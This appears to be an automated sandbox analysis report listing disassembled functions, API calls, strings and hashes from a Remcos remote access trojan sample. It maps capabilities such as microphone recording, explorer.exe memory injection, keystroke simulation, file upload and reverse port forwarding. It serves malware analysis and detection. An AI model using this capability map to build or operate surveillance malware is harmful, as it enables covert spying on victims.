                                                                                                                                                • _free.LIBCMT ref: 004481F8
                                                                                                                                                • _free.LIBCMT ref: 00448203
                                                                                                                                                • _free.LIBCMT ref: 0044820E
                                                                                                                                                • _free.LIBCMT ref: 0044821C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                                Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Eventinet_ntoa
                                                                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                                • API String ID: 3578746661-3604713145
                                                                                                                                                • Opcode ID: f263e4c13fc2064b78efa21c35b83796e15668e555435fd99ba599c6ad5ca075
                                                                                                                                                • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                                                                • Opcode Fuzzy Hash: f263e4c13fc2064b78efa21c35b83796e15668e555435fd99ba599c6ad5ca075
                                                                                                                                                • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                                                                                Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DecodePointer
                                                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                                                • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                                • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                                                                                • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                                • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                                                                                Function 0044B43C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                                                                                • __fassign.LIBCMT ref: 0044B4F9
                                                                                                                                                • __fassign.LIBCMT ref: 0044B514
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 1324828854-263838557
                                                                                                                                                • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                                                • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                                Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                • API String ID: 1462127192-2001430897
                                                                                                                                                • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                                                                                                                • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                                                                                • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                                                                                                                • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                                                Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\LdSbZG1iH6.exe), ref: 004074D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                • API String ID: 2050909247-4242073005
                                                                                                                                                • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                                                                                                                • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                                                                                • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                                                                                                                • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                                                                                Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _strftime.LIBCMT ref: 00401D50
                                                                                                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                                                • API String ID: 3809562944-243156785
                                                                                                                                                • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                                                                                                                • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                                                                                • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                                                                                                                • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                                                                                Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                                • int.LIBCPMT ref: 00410EBC
                                                                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                • String ID: ,kG$0kG
                                                                                                                                                • API String ID: 3815856325-2015055088
                                                                                                                                                • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                                                                                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                                                                                • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                                                                                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                                                                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                                                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                                • waveInStart.WINMM ref: 00401CFE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                • String ID: dMG$|MG$PG
                                                                                                                                                • API String ID: 1356121797-532278878
                                                                                                                                                • Opcode ID: e50daa58507802a607b8e69ff53587dfa1525f8723cff621260b0af96f5d677f
                                                                                                                                                • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                                                                                • Opcode Fuzzy Hash: e50daa58507802a607b8e69ff53587dfa1525f8723cff621260b0af96f5d677f
                                                                                                                                                • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                                Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                                  • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                                                                  • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                                                                  • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                                                • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                                • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                • String ID: Remcos
                                                                                                                                                • API String ID: 1970332568-165870891
                                                                                                                                                • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                                                • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                                • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                                                Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                                                                                                • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                                • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                                                                                                • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                                Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                                                                                                                • __freea.LIBCMT ref: 00454083
                                                                                                                                                • __freea.LIBCMT ref: 0045408F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 201697637-0
                                                                                                                                                • Opcode ID: 0e4c9693fbb30d8259a9360a9357c9a64508312006b92e836ecbd2da2b3ae83b
                                                                                                                                                • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                                • Opcode Fuzzy Hash: 0e4c9693fbb30d8259a9360a9357c9a64508312006b92e836ecbd2da2b3ae83b
                                                                                                                                                • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                                Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                                • _free.LIBCMT ref: 00445515
                                                                                                                                                • _free.LIBCMT ref: 0044552E
                                                                                                                                                • _free.LIBCMT ref: 00445560
                                                                                                                                                • _free.LIBCMT ref: 00445569
                                                                                                                                                • _free.LIBCMT ref: 00445575
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                • String ID: C
                                                                                                                                                • API String ID: 1679612858-1037565863
                                                                                                                                                • Opcode ID: 2813a1e0ac90985d52fee0968b9a0cfa35de9e1761f336dc1444ec918196fcc8
                                                                                                                                                • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                                • Opcode Fuzzy Hash: 2813a1e0ac90985d52fee0968b9a0cfa35de9e1761f336dc1444ec918196fcc8
                                                                                                                                                • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                                Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: tcp$udp
                                                                                                                                                • API String ID: 0-3725065008
                                                                                                                                                • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                                • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                                Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                                • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                • String ID: PkG$XMG$NG$NG
                                                                                                                                                • API String ID: 1649129571-3151166067
                                                                                                                                                • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                                                                                                • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                                • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                                                                                                                • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                                                Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                                                                                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                • String ID: .part
                                                                                                                                                • API String ID: 1303771098-3499674018
                                                                                                                                                • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                                                                                                                • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                                • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                                                                                                                • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                                Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SendInput.USER32 ref: 00419A25
                                                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                                                                • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                                                                  • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InputSend$Virtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1167301434-0
                                                                                                                                                • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                                                                • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                                                                • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
